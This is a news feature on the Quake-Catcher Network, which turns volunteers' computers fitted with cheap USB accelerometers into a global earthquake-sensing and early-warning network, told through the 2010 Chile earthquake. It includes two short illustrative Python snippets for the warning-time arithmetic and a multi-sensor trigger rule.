On Feb. 27, the 90-second Chilean earthquake erupted off the coast of the Maule Region, killing more than 400 people and triggering blackouts and a tsunami. It was the country’s strongest earthquake in five decades.
Photo courtesy of the Quake-Catcher Network.
It took days for Sepulveda to get back into his office because shifted furniture blocked his door. Once inside, he found that the USB device on his computer remained intact and collected not only the earthquake information, but also about one hour’s worth of data on the aftershocks.
“He was really interested in the network,” said Elizabeth Cochran, an assistant professor of seismology at the University of California, Riverside, who helped develop the QCN. “Little did he know he would end up recording this earthquake a month later.”
Four years in the making, the QCN was developed by Cochran and colleagues at Stanford University to fill gaps in current earthquake monitoring efforts, hampered by 10 to 15 second reporting delays and costly equipment.
By forming a global web of seismic sensors that captures data on the spot, Cochran said, the network can be the key to an earthquake early warning system.
In an earthquake, shock waves rip through the ground, but their speed is no match for electronic signals. The QCN could send messages to nearby locations seconds in advance — precious time that could be used to tell residents to find cover or for public safety departments to stop trains, raise fire station doors and shut off water and gas lines, which can prevent fires.
“When an earthquake starts, you can quickly determine the magnitude and the location,” she said. “What fire stations would love is a few seconds warning to open doors to that fire station so they can easily get equipment out.”
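The arithmetic behind those few seconds is simple. The sketch below uses illustrative numbers, not QCN figures: a typical crustal S-wave speed of about 3.5 km/s and an assumed 2-second detection-and-alert latency:

```python
def warning_seconds(distance_km, s_wave_kms=3.5, latency_s=2.0):
    """Rough early-warning margin: S-wave travel time minus system latency."""
    return distance_km / s_wave_kms - latency_s

# e.g. warning_seconds(100) is about 26.6 s for a site 100 km from the
# epicenter; at 10 km the margin shrinks to well under a second.
```

The warning window grows with distance from the epicenter, which is why a dense, far-flung sensor network matters: the closest sensors detect the quake, and everyone farther out gets the head start.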
Monitoring earthquakes has traditionally been a dirty job. Research would include digging into the earth to install new seismometers near fault lines.
“My main frustration is we don't have a huge number of seismometers around,” Cochran said, “just because they're so expensive and it takes a lot of work to install them.”
The technology in the Information Age has given Cochran another, much cleaner, method for monitoring shaky ground: rather than installing sensors deep in trenches, users can simply install software on their computers. The seismic network utilizes accelerometers — motion sensors that protect data on the hard drive if a laptop falls down or capture movement in video game controllers. Users can connect a $50 sensor with a USB cable and download the program directly. Some of the newer laptop models have accelerometers already built in.
As more users install the sensors on their computers, seismologists can gather data from anywhere in the world in the case of an earthquake. The idea is to develop a dense network that feeds data to a central computer system to paint a more vivid picture of how an earthquake behaves in a given place and time.
But a sensor on a computer isn’t as sensitive as a regular seismometer. It measures ground motion in three directions and can measure an earthquake with a magnitude 4.0 or higher. But researchers must determine the difference between an actual tremor and somebody banging on a table.
“The main difference is our sensors are not as sensitive,” Cochran said, “so you get lower-resolution data.”
But when a computer senses a tremor, it shoots a signal to the researchers’ servers, Cochran said, and if the server receives multiple pings from the same area, it’s probably an earthquake.
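A server-side trigger rule of that kind can be sketched simply. Everything here (the region bucketing, the thresholds, the function name) is invented for illustration, not taken from the QCN software:

```python
from collections import defaultdict

def detect_events(pings, min_triggers=3, window_s=10.0):
    """Flag a probable quake when several sensors in one region trigger together.

    `pings` is an iterable of (timestamp_s, region) pairs, sorted by time.
    """
    recent = defaultdict(list)            # region -> recent trigger times
    events = []
    for t, region in pings:
        # Keep only triggers inside the time window, then add this one
        times = [x for x in recent[region] if t - x <= window_s]
        times.append(t)
        if len(times) >= min_triggers:    # corroborated by multiple sensors
            events.append((t, region))
            times = []                    # report each event only once
        recent[region] = times
    return events
```

A single ping (someone bumping a table) never clears the threshold, but several near-simultaneous pings from one area do, which is exactly the filtering Cochran describes.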
Even though generating publicity for the network remains a challenge, the word is spreading, especially in the wake of the recent earthquakes.
The QCN has about 1,300 users on any given day logging on around the world, Cochran said, and up to 2,600 over a month. With the cheap price tag and simple installation, it’s no surprise how fast the network has been growing. And areas prone to earthquakes and other potential hazards attract new users.
“It's not really us asking them if they can help,” Cochran said, “but them asking us how they can help.”
In the future, Cochran and her colleagues plan to set up a database, so users can see which earthquakes their sensors recorded and how they contributed.
Since launching, the QCN has received funding from the National Science Foundation, the Southern California Earthquake Center and even UPS. (“They’re helping out with the costs of sending sensors overseas,” Cochran said.)
In the past few months, it hasn’t been a question of demand. In Chile, Cochran opened a Web page for citizens to volunteer to have a sensor installed at their house or office. But she said they had to shut down the site a few days later; some 700 volunteers responded, but they only had 100 available sensors.
“I think when people realize that they live in a place that has earthquakes, they definitely want to do more about it,” she said. “Any earthquake raises awareness.”
[Photo courtesy of Adam DuBrowa/FEMA.]